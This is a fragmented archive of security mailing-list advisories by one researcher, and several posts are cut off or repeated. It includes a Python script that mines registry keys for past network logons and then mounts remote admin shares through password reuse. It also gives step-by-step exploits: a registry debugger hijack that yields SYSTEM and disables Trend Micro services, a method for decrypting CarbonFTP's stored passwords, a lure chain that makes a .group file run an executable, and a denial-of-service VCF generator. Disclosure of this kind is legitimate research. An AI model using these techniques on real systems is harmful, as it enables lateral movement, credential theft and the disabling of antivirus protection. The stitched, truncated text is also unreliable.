#passwords match (password reuse) theres no prompt for credentials and we
get logged in automagically.
#
#MountPoints2 and Terminal server client hints in the Windows registry can
help us.
#Typically, MountPoints2 is used by Forensic analysts to help determine
where an attacker laterally moved to previously.
#REG Query
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
/F "##" (we want network logons)
#MountPoints2 key entries are stored like '##10.2.1.40#c$'
#---
BANNER="""
| \ __ )
__ \_ \ __|_ \__ \ | | __| _ \
| | __/ | ___ \ | | | | \__ \ __/
_| _| \___| \__| _/_\ / \__,_| / \___|
By Hyp3rlinx
ApparitionSec
"""
DRIVE="X"
FINDME="The command completed successfully."
REG_MOUNT2='REG Query
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
/F "##"'
REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal
Server Client\Servers\""+" /s"
VULN_FOUND=set()
DELAY=2 #Any lower and we may get inaccurate results.
rdp_server_lst=[]
#Return prior network logons to remote systems.
def mountpoints2():
mntpoint2_connections=[]
try:
p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True)
tmp = p.stdout.readlines()
except Exception as e:
print("[!] "+str(e))
return False
for x in tmp:
idx = x.find("##")
clean = x[idx:]
idx2 = clean.rfind("#")
ip = clean[2:idx2]
ip = re.sub(r"#.*[A-Z,a-z]","",ip)
if ip not in mntpoint2_connections:
mntpoint2_connections.append(ip)
mntpoint2_connections = list(filter(None, mntpoint2_connections))
p.kill()
return mntpoint2_connections
#Terminal server client stores remote server connections.
def rdp_svrs():
global rdp_server_lst
try:
p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True)
tmp = p.stdout.readlines()
for key in tmp:
if key.find("Servers")!=-1:
pos = key.rfind("\\")
srv = key[pos + 1:].replace("\r\n","").strip()
rdp_server_lst.append(srv)
p.kill()
except Exception as e:
print("[!] "+str(e))
return False
return True
#Disconnect
def del_vuln_connection(ip):
try:
print("[!] Disconnecting vuln network logon connection.\n")
call(r"net use "+DRIVE+":"+" /del")
except Exception as e:
print("[!] "+str(e))
#Check connection
def chk_connection(ip):
print("[+] Testing: "+ip)
sys.stdout.flush()
cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE,
shell=True)
stderr, stdout = cmd.communicate()
if "Reply from" in stderr and "Destination host unreachable" not in
stderr:
print("[*] Target up!")
return True
else:
print("[!] Target unreachable :(")
return False
#Test vuln
def Test_Password_Reuse(ip):
print("[+] Testing "+ip + " the builtin Administrator account.\n")
sys.stdout.flush()
try:
p = Popen("net use X: "+ip+"\\c$ /user:Administrator",
stdout=PIPE, stderr=PIPE, shell=True)
err = p.stderr.readlines()
if err:
e = str(err)
if e.find("error 53")!=-1:
print("[*] Network path not found\n")
return
elif e.find("error 1219")!=-1:
print("[*] Target connections to a server or shared
resource by the same user, using more than one user name are disallowed.\n")
return
elif e.find("error 85")!=-1:
print("[*] The local device name is already in use.\n")
return
else:
print(e+"\n")
tmp = p.stdout.read()
if FINDME in tmp:
print("[*] Password reuse for the built-in Administrator
found!")
print("[+] Connected to target: "+ ip)
[FD] Microsoft Windows "net use" Logon CMD / Insufficient Password Prompt
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor]www.microsoft.com [Product] Windows "net use" Command Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. [Vulnerability Type] Insuffient Password Prompt [CVE Reference] N/A [Security Issue] The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to has other vulnerabilities present. In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. The authentication mechanism between the two network logon methods are inconsistent and in my opinon leaves an authentication loophole invitation. Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less. Requirements: 1) Remote system built-in Administrator account is enabled 2) Origination system users account password and the remote system Administrator passwords match (reuse). Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case. Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue. However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails. Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry. Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections and try them and if theres password reuse (likely) BOOM automagic logon. This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used. When testing make sure to logout then log back in after changing passwords so the environment is clean. e.g. 1) Passwords for both systems are different and remote built-in Administrator account active: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator Enter the password for 'Administrator' to connect to '192.168.x.x': System error 5 has occurred. Access is denied. 2) Passwords for both origination system and remote match: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator The command completed successfully. By the way as a side note DCERPC calls work as well, if both systems happen to have same password. c:\>getmac /s x.x.x.x /U Administrator MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same." Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box? Expected result: Consistent password dialog box, no matter if passwords match or not. Actual Result: No prompt for a password if both systems passwords are the same. Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC. [Exploit/POC] import os,re,time,signal,sys from subprocess import * from multiprocessing import Process #By John Page (aka hyp3rlinx) #Apparition Security #twitter.com/hyp3rlinx #--- #When a remote systems built-in Administrator account is enabled and both the remote and the target system #passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. # #MountPoints2 and Terminal server client hints in the Windows registry can help us. #Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. #REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) #MountPoints2 key entries are stored like '##10.2.1.40#c$' #--- BANNER=""" _ __ ___ __ ___ __ / | / / /_ __/ / | / __ )/ / / / ___// / / |/ / __/ / // /| | / __ / / / /\__ \/ __/
[FD] Recon-Informer v1 - Intel for offensive systems tool.
import logging,os,ctypes,sys,argparse,time,re from subprocess import * from datetime import datetime from pkgutil import iter_modules import pkg_resources #Recon-Informer (c) #By John Page (Hyp3rlinx) #ApparitionSec #hyp3rlinx.altervista.org #twitter.com/hyp3rlinx #apparition...@gmail.com #PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc #== # #Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive #security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy. # #Purpose: #Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever. #Its purpose is detect possible recon against our attacker system on a LAN to provide us defensive intel. #Therefore, this script is most useful for basic short-term defensive visibility. # #Features: #Attempt to detect and identify typical port scans generated using Nmap including scan type. #-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy). # #FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect result. #XMAS scans work against systems following RFC 793 for TCP/IP and don’t work against any Windows versions, #NULL is another type that don't work well on Windows. # #However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS #its run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied. #With -s flag you can add extra scan types to detect that otherwise would be ignored. # #PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default. #Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you #will see this detection preceding most scans. Also, you may see (noise) non-reconaissance related ARP #requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag. # #ICMP #Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping. # #BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS. #Firewall rule for blocks are in-bound "ANY" but still allows out-bound. #FW rules are named like ReconInformer_. # #DELETE FW RULE -d to remove FW rules for blocked hosts. # #WHITELIST -w HOST-IP(s) you never want to block on. # #FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc. #ignore packets destined for specific ports to try reduce false positive probe alerts. # #IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS #from SMB connected shares to try reduce false positives. # #LOG -l flag, default size limit for writing to disk is 1MB. # #UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc. #To detect UDP scans use the -u flag, then can also combine with -f port filter #(reduce noise) on specific dest ports like 137,161,1900,2869,7680. # #PCAP saving -s flag, default size limit is also 1MB. # #RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect. # #Private Network range: #Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored. # #BYPASS examples --scanflags and custom packet window sizes: #Recon-Informer does not try to detect every case of --scanflags or specially crafted packets. # #These scans can bypass Recon-Informer and correctly report open ports found. #nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139 #nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x # #Therefore, I accounted for some of these in Recon-Informer to report these detections. # #SCANFLAGS #nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct) #nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct) #nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothin useful returned) #nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful) #nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful) # #The above scanflag examples, would have bypassed detection if we didn't check packets for them. #Useful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks: # #10=(0x00a) SYNPSH #34= (0x22) SYNURG #42=(0x02a) SYNPSHURG #66 (0x42) SYNECN #74 (0x04a) SYNPSHECN #98 (0x062) SYNURGECN #106 (0x06a) SYNPSHURGECN #130 (0x082) SYNCWR #138 (0x08a) SYNPSHCWR #162 (0x0a2) SYNURGCWR #170 (0x0aa) SYNPSHURGCWR #194 (0x0c2) SYNECNCWR #202 (0x0ca) SYNPSHECNCWR #226 (0x0e2) SYNURGECNCWR #234 (0x0ea) SYNPSHURGECNCWR # #Custom packet window size from 1024 typical of Nmap SYN scans to a size of 666 for the bypass!. #ip=IP(dst="192.168.1.104") #syn=TCP(sport=54030,dport=139,window=666,flags="S") #send(ip
[FD] Recon-Informer v1 - Intel for offensive systems tool
Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive security systems, useful for penetration testers. It runs on Windows/Linux and leverages Scapy. https://github.com/hyp3rlinx/0/blob/master/Recon-Informer.py Thanks and stay safe to all, hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2019-18915 HP System Event Utility / Privilege Escalation Vulnerability
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.hp.com [Product] HP System Event Utility The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc. HP System Event Utility enables the functioning of special function keys on select HP devices. [Vulnerability Type] Local Privilege Escalation [CVE Reference] CVE-2019-18915 [Security Issue] The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. HPMSGSVC.exe runs a background process that delivers push notifications. The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe" if found in the users c:\ drive. Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe Two Handles are inherit, properties are Write/Read Name: \Device\ConDrv This results in arbitrary code execution persistence mechanism if an attacker can place an EXE in this location and can be used to escalate privileges from Admin to SYSTEM. HP has/is released/releasing a mitigation: https://support.hp.com/us-en/document/c06559359 [References] PSR-2019-0204 https://support.hp.com/us-en/document/c06559359 [Network Access] Local [Disclosure Timeline] Vendor Notification: October 7, 2019 HP PSRT "product team will address the issue in next release" : January 13, 2020 HP advisory and mitigation release : February 10, 2020 February 11, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [UPDATED - POC] Neowise CarbonFTP v1.4 / Insecure Proprietary Password Encryption / CVE-2020-6857
Updated, exploit PoC had a check for an unused module was testing and removed, had two versions but previously sent the wrong one. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.neowise.com [Product] CarbonFTP v1.4 CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be quickly re-used later. Download: https://www.neowise.com/freeware/ Hash: 7afb242f13a9c119a17fe66c6f00a1c8 [Vulnerability Type] Insecure Proprietary Password Encryption [CVE Reference] CVE-2020-6857 [Affected Component] Password Encryption [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Security Issue] CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex are coverted to decimal which is then computed by adding the key "97F" to the result. The key 97F seems to be the same for all executables across all systems. Finally, passwords are stored as decimal values. If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files. They can be found under "C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects". e.g. Password=STRING|"2086721956209392195620939" Observing some very short password examples we see interesting patterns: 27264 27360 27360 27360 27360= a 27520 27617 27617 27617 27617= b 27266 27616 27360 27361 27616= aab 27521 27616 27616 27616 27616= ba Password encryption/decryption is as follows. Encryption process example. 484C as decimal is the value 18508 97F hex to decimal is the value 2431 (encrypt key) 18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL". To decrypt we just perform the reverse of the operation above. 20939 - 2431 = 18508 Next, convert the decimal value 18508 to hex and we get 484C. Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL". CarbonFTP passwords less than nine characters are padded using chars from the current password up until reaching a password length of nine bytes. The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length of nine bytes "XYXYXYXYX". Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH" However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one shot without having several candidates to choose from with one of them being the correct password. Therefore, "LONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and because it is greater than nine bytes it is cracked without any candidate passwords returned. From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process. Using the same password "HELL" as example. BPX @47DA6F 0047DA6F | 8D 45 F0 | lea eax,dword ptr ss:[ebp-10] | 0047DA72 | 50 | push eax | 0047DA73 | B9 05 00 00 00 | mov ecx,5 | 0047DA78 | 8B D3| mov edx,ebx | 0047DA7A | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678 | 0047DA82 | 83 C3 05 | add ebx,5 | 0047DA85 | 8B 45 F0 | mov eax,dword ptr ss:[ebp-10] | [ebp-10]:"20867" 0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C | 0047DA8D | 2B 45 F8 | sub eax,dword ptr ss:[ebp-8] | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431 0047DA90 | 66 89 06 | mov word ptr ds:[esi],ax | 0047DA93 | 83 C6 02 | add esi,2 | 0047DA96 | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418 | 0047DA9E | 3B D8| cmp ebx,ea
[FD] Neowise CarbonFTP v1.4 / Insecure Proprietary Password Encryption / CVE-2020-6857
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.neowise.com [Product] CarbonFTP v1.4 CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be quickly re-used later. Download: https://www.neowise.com/freeware/ Hash: 7afb242f13a9c119a17fe66c6f00a1c8 [Vulnerability Type] Insecure Proprietary Password Encryption [CVE Reference] CVE-2020-6857 [Affected Component] Password Encryption [Impact Escalation of Privileges] true [Impact Information Disclosure] true [Security Issue] CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex are coverted to decimal which is then computed by adding the key "97F" to the result. The key 97F seems to be the same for all executables across all systems. Finally, passwords are stored as decimal values. If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files. They can be found under "C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects". e.g. Password=STRING|"2086721956209392195620939" Observing some very short password examples we see interesting patterns: 27264 27360 27360 27360 27360= a 27520 27617 27617 27617 27617= b 27266 27616 27360 27361 27616= aab 27521 27616 27616 27616 27616= ba Password encryption/decryption is as follows. Encryption process example. 484C as decimal is the value 18508 97F hex to decimal is the value 2431 (encrypt key) 18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL". To decrypt we just perform the reverse of the operation above. 20939 - 2431 = 18508 Next, convert the decimal value 18508 to hex and we get 484C. Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL". CarbonFTP passwords less than nine characters are padded using chars from the current password up until reaching a password length of nine bytes. The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length of nine bytes "XYXYXYXYX". Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH" However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one shot without having several candidates to choose from with one of them being the correct password. Therefore, "LONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and because it is greater than nine bytes it is cracked without any candidate passwords returned. From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process. Using the same password "HELL" as example. BPX @47DA6F 0047DA6F | 8D 45 F0 | lea eax,dword ptr ss:[ebp-10] | 0047DA72 | 50 | push eax | 0047DA73 | B9 05 00 00 00 | mov ecx,5 | 0047DA78 | 8B D3| mov edx,ebx | 0047DA7A | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678 | 0047DA82 | 83 C3 05 | add ebx,5 | 0047DA85 | 8B 45 F0 | mov eax,dword ptr ss:[ebp-10] | [ebp-10]:"20867" 0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C | 0047DA8D | 2B 45 F8 | sub eax,dword ptr ss:[ebp-8] | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431 0047DA90 | 66 89 06 | mov word ptr ds:[esi],ax | 0047DA93 | 83 C6 02 | add esi,2 | 0047DA96 | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939" 0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418 | 0047DA9E | 3B D8| cmp ebx,eax | 0047DAA0 | 7E CD| jle carbonftp.47DA6F | Ok, simple explanation after SetBPX in 47DA
[FD] CVE-2019-19697 / Trend Micro Security 2019 (Consumer) / Security Bypass Protected Service Tampering
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt [+] ISR: ApparitionSec [Vendor] www.trendmicro.com [Product] Trend Micro Security 2019 (Consumer) Multiple Products Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft. [Vulnerability Type] Security Bypass Protected Service Tampering [CVE Reference] CVE-2019-19697 [Security Issue] Trend Micro Maximum Security is vulnerable to arbitrary code execution as it allows for creation of registry key to target a process running as SYSTEM. This can allow a malware to gain elevated privileges to take over and shutdown services that require SYSTEM privileges like Trend Micros "Asmp" service "coreServiceShell.exe" which does not allow Administrators to tamper with them. This could allow an attacker or malware to gain elevated privileges and tamper with protected services by disabling or otherwise preventing them to start. Note administrator privileges are required to exploit this vulnerability. [CVSS 3.0 Scores: 3.9] [Affected versions] Platform Microsoft Windows Premium Security 2019 (v15) Maximum Security 2019 (v15) Internet Security 2019 (v15) Antivirus + Security 2019 (v15) [References] https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx [Exploit/POC] 1) Create a entry for the following registry key targeting "PtWatchdog.exe" and set the debugger string value to an arbitrary executable to gain SYSTEM privs. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe 2) Create a string named "debugger" under the reg key and give it the value of the executable you wish to run as SYSTEM. 3) Restart the machine or wait until service is restart then you get SYSTEM and can now disable Trend Micro endpoint security coreServiceShell.exe service [Network Access] Local [Severity] Low [Disclosure Timeline] Vendor Notification: October 8, 2019 Vendor confirms issue: October 28, 2019 Vendor release date: January 14, 2020 January 16, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows VCF Card / Mailto Link Denial Of Service
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
A VCF file is a standard file format for storing contact information for a
person or business.
Microsoft Outlook supports the vCard and vCalendar features.
These are a powerful new approach to electronic Personal Data Interchange
(PDI).
[Vulnerability Type]
Mailto Link Denial Of Service
[CVE Reference]
N/A
[Security Issue]
Windows VCF cards do not properly sanitize email addresses allowing for
HTML injection.
A corrupt VCF card can cause all the users currently opened files and
applications to be closed
and their session to be terminated without requiring any accompanying
attacker supplied code.
This can be done by crafting the Mailto link to point to Windows
"logoff.exe". The corrupt VCF card can then
kill all users applications and also log the target off their computer, if
the VCF card is opened in
using Windows Contacts and the link is clicked.
The logoff.exe executable lives in "C:\Windows\System32" and can terminate
applications and log out users without requiring args.
This probably will affect Windows 7 the most as Windows 10 can possibly
default opening VCF files in other programs
like (People). However, users can possibly still choose to open the VCF in
Contacts by right-click the file.
Note, this exploit requires user interaction.
[Exploit/POC]
"VCF_DoS.py"
dirty_vcf=(
'BEGIN:VCARD\n'
'VERSION:4.0\n'
'FN:Session Terminate PoC - ApparitionSec\n'
'EMAIL:d...@microsoft.com\n'
'END:VCARD')
f=open("DoS.vcf", "w")
f.write(dirty_vcf)
f.close()
print "VCF Denial Of Service card created!"
print "By hyp3rlinx"
[POC Video URL]
https://www.youtube.com/watch?v=P4OGN7pZLSg
[Network Access]
Local
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: January 2, 2020
MSRC : "In order to investigate your report I will need an explanation on
how an attacker could use the information
to exploit another user remotely without the use of social
engineering... As such, this thread is being closed"
: January 3, 2020
January 4, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows .Group File / URL Field Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt [+] twitter.com/hyp3rlinx [+] apparitionsec@gmail [+] ISR: Apparition Security [Vendor] www.microsoft.com [Product] Windows ".Group" File Type Gorup files are a collection of contacts created by Windows Contacts, an embedded contact management program included with Windows. It contains a list of contacts saved into a group; which can be used to create a mailing list for sending email messages to multiple addresses at once. [Vulnerability Type] URL Field Code Execution [CVE Reference] N/A [Security Issue] Windows ".group" files are related to Contact files and suffer from unexpected code execution when clicking the "Contact Group Details" tab Website Go button. This happens if the website URL field points to an executable file. This is the same type of vulnerability affecting Windows .contact files that remains unfixed as of the time of this writing and has a metasploit module available. [References] http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt Therefore, attacker supplied executables can run unexpected to the user, who thinks they visit a website when click the Website go button. Moreover, if files are compressed using certain archive utilities it may be possible to skirt security warnings even when the executable is internet downloaded or copied from network share. This exploit requires a bit more user interaction than the previously disclosed .contact file vulnerability, as the GROUP file will complain if not in the Contacts directory. Advisory released for the sake of completeness and user security awareness. [Exploit/POC] 1) create a Windows .group file 2) create a directory named "http" 3) create an executable file with a .com ext (change .exe to .com) like www.microsoft.com an place it in the "http" dir alongside .group file. 4) point the website URL to the executable using path traversal like "http.\ www.microsoft.com" which is the website address in the .group file. Note: the directory traversal can also point to other dirs like ..\Downloads\http.\microsoft.com but downside is the URL looks very sketchy. 5) package it up in an archive .rar etc. 6) send the .group file via email, or download it and lure the user to place the archive in the "c:\User\\Contacts" directory. 7) open the archive and double click the .group file (Windows will complain with an error to move to the contacts folder if not within that dir already) next click the website address go button. The attackers executable will run instead of navigating to a website as would be expected by an end user. [Severity] High [Disclosure Timeline] Vendor Notification: Same type vuln affecting .contact files disclosed January 16, 2019, status remains unfixed. January 1, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows Media Center / XXE MotW Bypass (Anniversary Edition)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security
[Vendor]
www.microsoft.com
[Product]
Microsoft Windows Media Center
Windows Media Center is a discontinued digital video recorder and media
player created by Microsoft.
Media Center was first introduced to Windows in 2002 on Windows XP Media
Center.
[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)
[CVE Reference]
N/A
[Security Issue]
This vulnerability was originally released by me back on December 4, 2016,
yet remains unfixed.
Now, to make matters worse I will let you know "mark-of-the-web" MotW does
not matter here, its just ignored.
Meaning, if the .MCL file is internet downloaded it gets the MOTW but files
